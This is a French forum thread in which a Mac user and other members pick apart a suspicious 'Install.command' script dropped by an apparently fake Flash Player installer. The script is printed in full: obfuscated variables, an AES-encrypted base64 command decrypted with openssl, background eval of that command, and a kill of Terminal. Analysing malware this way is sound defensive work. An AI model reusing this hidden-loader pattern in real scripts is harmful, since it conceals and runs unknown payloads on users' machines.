openssl - Script malveillant ?

Version imprimable

Je viens de trouver sur mon mac un volume "/Volumes/Install" probablement monté par l'installeur de Adobe Flash Player (que je viens de lancer), dont le contenu m'interpelle:

Code:

1
2
3
4
5
6
7
8
$ ls -laF /Volumes/Install
total 96
drwxr-xr-x  6 jack  staff    272  3 mai 15:55 ./
drwxr-xr-x  5 root  wheel    160 29 jul 12:10 ../
-rw-r--r--  1 jack  staff  16388  3 mai 15:55 .DS_Store
drwxr-xr-x  4 jack  staff    136  3 mai 15:54 .hidden/
-rw-r--r--  1 jack  staff  24065  3 mai 15:55 .sjQZT31xHE.png
lrwxr-xr-x  1 jack  staff     23  3 mai 15:55 Install@ -> .hidden/Install.command

Code:

1
2
3
4
5
6
7
8
9
$ ls -laF /Volumes/Install/.hidden:
total 720
drwxr-xr-x  4 jack  staff     136  3 mai 15:54 ./
drwxr-xr-x  6 jack  staff     272  3 mai 15:55 ../
-rw-r--r--  1 jack  staff  202776  3 mai 15:54 2P1zsqQ
-rwxrwxrwx@ 1 jack  staff     896  3 mai 15:54 Install.command*
 
$ file /Volumes/Install/.hidden/2P1zsqQ 
/Volumes/Install/.hidden/2P1zsqQ: openssl enc'd data with salted password, base64 encoded

Le contenu du script est "encrypté" (avec un très très très faible niveau d'encryption!):

Code:

1
2
3
4
5
6
7
8
9
10
#!/bin/bash
A="a";C="c";D="d";E="e";L="l";M="m";N="n";O="o";P="p";S="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX19PirpiUvZVXJURbVDsu4fckJoMWR7UHtP5ORyLB+dz/Kl5hJixSJLItUpkynZbcVxd98nfHH3xJwRWWkgAPynQTGNsqO2MKLHIGjQrJIsibmDRd13M8tvC14MkiKVa9SJAewH/NkHjfSMw0Ml5VbfJ7VMepYBlG5XfxqJ+wAdjfU+LiQqNEcrHKJr+Zoe33HEaCL3SWtYFSwOvUy9m8nUasOujyTPoMtNZhccr7ZRcjOyH9D6s2MHxK9UREQ8hHVugcmcEqDzJag8KWPFTKA+9YWp++/WzSQnFsHb9mT4HXqWdHfnW+3h9'
decryptedCommand="$(echo -e "$commandArgs" | ${O}${P}${E}${N}${S}${S}${L} ${E}${N}${C} -${A}${E}${S}-256-cbc -${D} -A -b${A}${S}${E}64 -${P}${A}${S}${S} "${P}${A}${S}${S}:$archive")"
nohup /bin/bash -c "eval \"$decryptedCommand\"" >/dev/null 2>&1 &
killall Terminal

Je ne connais pas du tout openssl...
Lorsque je remplace les 2 dernières lignes par echo "$decryptedCommand", voici ce que j'obtiens:

Code:

1
2
3
4
5
6
7
$ ./Install-jack.command 
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
4610055616:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:crypto/evp/evp_enc.c:583:
?bb_C"є?X?a5N?Q??;?֐??[????u7??Љ???7^????k	?X??6t??yB?7?ٴե?*R?6A??????i5?N???Ag~68X??Dq
[+ quelques lignes du même acabit]

Par contre, en commentant simplement les 2 dernières lignes, une popup s'affiche avec le message:

Citation:

« Install-jack.command » endommagera votre ordinateur. Vous devriez placer cet élément dans la Corbeille.
Firefox a téléchargé ce fichier le 5 mai 2020 depuis soft4update.thesaferplayerfinal.info.
Prévenir Apple.

Est-ce grave, docteurs?

29/07/2020, 14h00
disedorgue

Si tu veux voir le code chiffré, essaye:

te mettre dans le fameux répertoire hidden

exporter la variable commandArgs avec la valeur indiquée dans le script, puis lancer

Code:

echo -e "$commandArgs" | openssl enc -aes-256-cbc -d -A -base64 -pass 'pass:2P1zsqQ'

Enfin, aux infos que tu nous a fourni car de notre coté, on ne peut pas le faire car la clé est le fichier '2P1zsqQ' (enfin je pense, il calcul son nom dans le script)
29/07/2020, 14h13
Flodelarab
Bonjour :coucou:
- Déjà, la source de téléchargement du fichier ne donne pas confiance.
- Ensuite, la commande Openssl fait de la cryptographie (ENC), dans le sens déchiffrement (-d).
- D'autre part, le message d'erreur est sans doute dû à une légère différence entre LibreSSL (Mac) et OpenSSL (Autres).
- Enfin, ce n'est pas grave puisque tu es intervenu avant toute exécution. Le conseil de placer le fichier dans la corbeille n'est pas mauvais. (Litote)
29/07/2020, 22h00
jack-ft

Citation:

Envoyé par disedorgue

Code:

echo -e "$commandArgs" | openssl enc -aes-256-cbc -d -A -base64 -pass 'pass:2P1zsqQ'

Enfin, aux infos que tu nous a fourni car de notre coté, on ne peut pas le faire car la clé est le fichier '2P1zsqQ' (enfin je pense, il calcul son nom dans le script)

Oui, c'est bien le résultat des 2 "rev". J'ai déjà fait ça et j'ai obtenu le même message d'erreur "bad decrypt".
29/07/2020, 22h01
jack-ft
Citation:
Envoyé par Flodelarab

Bonjour :coucou:

Déjà, la source de téléchargement du fichier ne donne pas confiance.
Ensuite, la commande Openssl fait de la cryptographie (ENC), dans le sens déchiffrement (-d).
D'autre part, le message d'erreur est sans doute dû à une légère différence entre LibreSSL (Mac) et OpenSSL (Autres).
Enfin, ce n'est pas grave puisque tu es intervenu avant toute exécution. Le conseil de placer le fichier dans la corbeille n'est pas mauvais. (Litote)
Ok, merci.

Poubelle !

salut,
Citation:
Envoyé par jack-ft
Code:

1 2 3 4 5 6 #!/bin/bash A="a";C="c";D="d";E="e";L="l";M="m";N="n";O="o";P="p";S="s"; export appDir=$(cd "$(dirname "$0")"; pwd -P) (...) nohup /bin/bash -c "eval \"$decryptedCommand\"" >/dev/null 2>&1 & killall Terminal
rien qu'à voir la façon dont c'est codé c'est clairement un script malveillant.
le fait que tout soit obfusqué (même avec une couche de chiffrement simple) renforce cette idée.
le fait de trouver un eval $decryptedCommand renforce encore les soupçons.

t'as déniché une vilaine bêbête, c'est toujours rigolo à décortiquer, faut juste prendre des précautions, ici essentiellement ne pas exécuter le eval

edit: on trouve quelques références à des malwares connus sur le net, voir https://webcache.googleusercontent.com/search?q=cache:H_qXPi0OYygJ:https://forums.malwarebytes.com/topic/262123-fake-adobeflashplayerinstallerdmg-installed-this-script/%3Fdo%3DgetLastComment+&cd=3
(foutu forum qui fait des trucs qu'on lui demande pas avec les liens...)

31/07/2020, 12h36
jack-ft
Citation:

Envoyé par BufferBob

rien qu'à voir la façon dont c'est codé c'est clairement un script malveillant.
le fait que tout soit obfusqué (même avec une couche de chiffrement simple) renforce cette idée.
le fait de trouver un eval $decryptedCommand renforce encore les soupçons.

Je suis tout à fait d'accord!

Citation:

t'as déniché une vilaine bêbête, c'est toujours rigolo à décortiquer, faut juste prendre des précautions, ici essentiellement ne pas exécuter le eval

Personnellement, je ne suis pas trop inquiet:
- L'outil "Malwarebytes" n'a rien trouvé.
- L'exécution (partielle, pour ne pas prendre de risques):
  - soit provoque une erreur (sans doute due à une légère différence entre LibreSSL (Mac) et OpenSSL (Autres)).
  - soit déclenche une alerte capturée par les outils d'Apple enjoignant à mettre le script à la poubelle.
Citation:

edit: on trouve quelques références à des malwares connus sur le net, voir https://webcache.googleusercontent.com/search?q=cache:H_qXPi0OYygJ:https://forums.malwarebytes.com/topic/262123-fake-adobeflashplayerinstallerdmg-installed-this-script/%3Fdo%3DgetLastComment+&cd=3
(foutu forum qui fait des trucs qu'on lui demande pas avec les liens...)

Merci pour le lien.
Effectivement, il semble que ce soit le même.